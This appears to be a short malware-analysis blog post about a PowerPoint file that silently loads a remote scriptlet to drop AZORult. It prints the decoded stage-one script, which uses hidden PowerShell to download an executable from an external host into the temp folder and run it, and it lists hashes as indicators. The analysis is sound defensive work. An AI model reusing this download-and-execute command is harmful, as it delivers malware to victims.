Nowadays Microsoft office documents are often used to propagate Malware acting like dynamic droppers. Microsoft Excel within macros or Microsoft Word with user actions (like links or external OLE objects) are the main player in this "Office Dropping Arena". When I figured out that a Microsoft Powerpoint was used to drop and to execute a Malicious payload I was amazed, it's not so common (at least on my personal experiences), so I decided to write a little bit about it.
The "attack-path" is very close to what it's observable on modern threats since years: eMail campaign with attached document and actionable text on it. At the beginning the Microsoft Powerpoint presentation looked like a white blank page but performing a very interesting and hidden connection to: hxxps://a.doko.moe/wraeop.sct.
Analysing the Microsoft Powerpoint structure it rises on my eyes the following slide structure
|Stage 1: Microsoft PowerPoint Dropping Website|
Target="%73%63%72%49%50%54:%68%74%74%70%73%3A%2F%2F%61%2E%64oko%2Emo%65%2Fwr%61%65o%70%2E%73%63%74"Decoding that string from HEX to ASCII is much more readable:
var run = new ActiveXObject('WSCRIPT.Shell').Run(powershell -nologo -executionpolicy bypass -noninteractive -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://batteryenhancer.com/oldsite/Videos/js/DAZZI.exe', '%temp%/VRE1wEh9j0mvUATIN3AqW1HSNnyir8id.exe'); Start-Process '%temp%/VRE1wEh9j0mvUATIN3AqW1HSNnyir8id.exe' );The script downloads a file named: AZZI.exe and saves it by a new name: VRE1wEh9j0mvUATIN3AqW1HSNnyir8id.exe on a System temporary directory for running it. The downloaded PE Executable is a .NET file created by ExtendedScript Toolkit (according to compilation time) on 2018-11-13 15:21:54 and submitted few hours later on VirusTotal.
|Stage 3: .NET file|
Stage4: AZORult evidences
I hope you had fun on this, I did! It was super interesting to see Attacker's creativity and the way the act to include malicious contents into Office Documents. Microsoft should probably take care of this and try to filter or to ask permissions before include external contents, but still this will not be a complete solution (on my personal point of view). A more deep and invasive action would be needed to check the remote content. Stay tuned!
Original Powerpoint: 6ae5583ec767b7ed16aaa45068a1239a827a6dae95387d5d147c58c7c5f71457
Resource Img: 965b74e02b60c44d75591a9e71c94e88365619fe1f82208c40be518865a819da